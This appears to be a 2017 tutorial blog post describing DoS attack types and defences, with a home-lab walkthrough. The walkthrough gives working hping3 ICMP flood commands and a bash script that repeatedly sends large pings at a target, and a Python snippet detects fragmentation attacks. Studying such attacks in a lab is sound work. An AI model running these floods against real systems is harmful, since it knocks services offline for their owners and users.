
DoS (Denial of Service) Attack Types

by Luuii 2017. 10. 22.


- Flood Attack

- Software Attack

 

> SYN Flood

> UDP Flood

> ICMP Flood

> Land Attack

> Teardrop Attack

 

Flood Attack

> TCP SYN Flood : the attacker spoofs the source IP and opens half-open TCP connections to exhaust the target host's listening queue.

> UDP Flood Attack : floods the target with UDP datagrams whose body is padded with garbage data.

> ICMP Smurfing Attack : an attack that abuses the ICMP protocol together with IP broadcast addresses.

> ICMP Flood Attack

 

Software Attack

- Ping of Death : uses the ping command to send abnormally large ICMP packets.

- Teardrop : sends packets whose fragments overlap, or leave gaps at regular intervals (typically by reusing the same fragment offset).

 

Another way to classify DoS/DDoS attacks

- Volume Based Attack

> UDP Flood, ICMP Flood, Spoofed packet-based flood

- Protocol Attack

> SYN Flood, Ping of Death, Smurf, Teardrop, fragmented packets, etc.

- Application Layer Attack

> HTTP Flood, Slowloris Attack

- Session Exhaustion

 

SYN Flood Attack

> The attacker deliberately keeps sending TCP SYN segments without acknowledging the server's SYN responses.

> This kind of attack is usually originated by a spoofed source IP address, making it harder to track down the attacker.

ICMP Flood Attack

> Similar to the SYN Flood attack, an ICMP flood takes place when an attacker overloads its victim with a huge number of ICMP echo requests with spoofed source IP addresses.

> The simplest defense was to disable ICMP entirely on untrusted interfaces; a more elaborate approach is to put ICMP requests under policy and rate-limit them when an attack is detected.

 

UDP Flood Attack

> UDP flooding doesn't differ from ICMP flooding.

> The only difference in this case is the fact that the IP packets that the attacker uses against its victim contain UDP datagrams of different sizes.

 

Land Attack

> When the attacker initiates a SYN Flood attack using the IP address of the victim as source and destination IP address, then it is said that the attacker has launched a "Land attack".

 

Teardrop Attack

> This type of attack deals with fragmentation and reassembly of IP packets.

> The IP header contains the necessary fields to handle fragmentation issues.

> Basically there are three fields within an IP datagram related to fragmentation and reassembly:

- Do not fragment bit

- More fragments bit

- Fragment Offset

 

The Fragment Offset field, which is the crucial field in our case, is used to indicate the starting position of each fragment relative to the original unfragmented packet. An attacker could start transmitting fragmented IP packets containing overlapped Fragment Offsets making the victim unable to reassemble them exhausting the victim's resources and possibly crashing it.

 

The PING of Death

> There is a specific ICMP echo variation that could cause a system crash. The difference of the echo request from the normal ones is the large size of the IP packet it contains. RFC 791 specifies that the maximum size of an IP packet is 65,535 bytes. An ICMP echo request with more than 65,507 (65,535-20-8) bytes of data could cause a remote system to crash while reassembling the packet fragments.

[Original text ends here]

https://www.pluralsight.com/blog/it-ops/ping-of-death-and-dos-attacks
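The two fragmentation checks a receiver or IDS would apply to the Teardrop and Ping of Death cases above, as an added example (not from the quoted article or this post). It works on fragment records with the offset in 8-byte units, as the IP header stores it, and the sample records are constructed, not captured.

```python
"""Flag fragment streams matching the Teardrop pattern (overlapping Fragment
Offsets) or the Ping of Death pattern (reassembled datagram larger than the
65,535-byte RFC 791 limit). Added example; not code from the quoted article."""
from dataclasses import dataclass

IP_MAX_LEN = 65535   # RFC 791: maximum total length of an IP datagram
IP_HDR_LEN = 20      # minimal IPv4 header, the "20" in 65,535-20-8 above


@dataclass
class Fragment:
    ident: int            # IP Identification field: groups fragments of one datagram
    offset_units: int     # Fragment Offset field, counted in 8-byte units
    payload_len: int      # bytes of data following the IP header
    more_fragments: bool  # MF bit; False marks the last fragment


def check_fragments(frags):
    """Return (ident, reason) findings for every suspicious datagram."""
    findings = []
    by_id = {}
    for f in frags:
        by_id.setdefault(f.ident, []).append(f)
    for ident, parts in by_id.items():
        parts = sorted(parts, key=lambda p: p.offset_units)
        end_seen = 0  # byte position where the previous fragment's data ended
        for p in parts:
            start = p.offset_units * 8
            if start < end_seen:  # this fragment claims bytes already covered
                findings.append((ident, "overlapping fragment offsets (Teardrop pattern)"))
                break
            end_seen = start + p.payload_len
        total = max(p.offset_units * 8 + p.payload_len for p in parts) + IP_HDR_LEN
        if total > IP_MAX_LEN:
            findings.append((ident, "reassembled datagram exceeds 65,535 bytes (Ping of Death pattern)"))
    return findings


# Constructed sample records (not from a real capture):
SAMPLE = [
    # ident 1: well-formed two-fragment datagram, 1480 + 20 data bytes
    Fragment(1, 0, 1480, True), Fragment(1, 185, 20, False),
    # ident 2: second fragment starts at byte 8 while the first covers bytes 0..1479
    Fragment(2, 0, 1480, True), Fragment(2, 1, 1480, False),
    # ident 3: last fragment lands at byte 65,512 and pushes the total past 65,535
    Fragment(3, 0, 1480, True), Fragment(3, 8189, 100, False),
]

if __name__ == "__main__":
    for ident, reason in check_fragments(SAMPLE):
        print(f"ID {ident}: {reason}")
```

A single unfragmented echo request with exactly 65,507 data bytes (65,515 bytes after the ICMP header) is not flagged, matching the limit quoted above.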

 

ICMP LAND (Local Area Network Denial) Attack (e.g. ping of death)

> An attack that sends a large volume of ICMP messages to systems, servers and transmission equipment, generating load on the network and the systems.

 

Note : Junos OS supports land attack protection for both IPv4 and IPv6 packets.

 

- Systems used

> win2008    (Victim System)

> KaliLinux    (Attack System)

 

( Win2008 )

Open Task Manager and monitor the network

Run Wireshark to monitor packets

 

( Kali Linux )

# gnome-system-monitor &

 

Check the target system

# hping3 -S 192.168.20.201 -p 80 -c 3

 

Run the flooding attack

# hping3 -1 192.168.20.201 --flood -d 20

-1 > ICMP Mode

--flood > flooding attack

-p > port number

-d > data size

 

( Win2008 )

Monitoring

 

(Caution) The attacker's system is put under load as well.

 

(Simple tool) ping.sh

 

#!/bin/bash

if [ $# -ne 2 ] ; then
    echo "Usage: $0 <Target IP> <MAXCOUNT>"
    exit 1
fi

IP=$1
MAX=$2
DATASIZE=60000

for i in $(seq 1 "$MAX")
do
    ping -s "$DATASIZE" "$IP" > /dev/null 2>&1 &
    sleep 5
done

sleep 86400

 

 

A brief explanation of application layer attacks:

https://www.cloudbric.com/blog/2015/03/application-level-attacks/

 
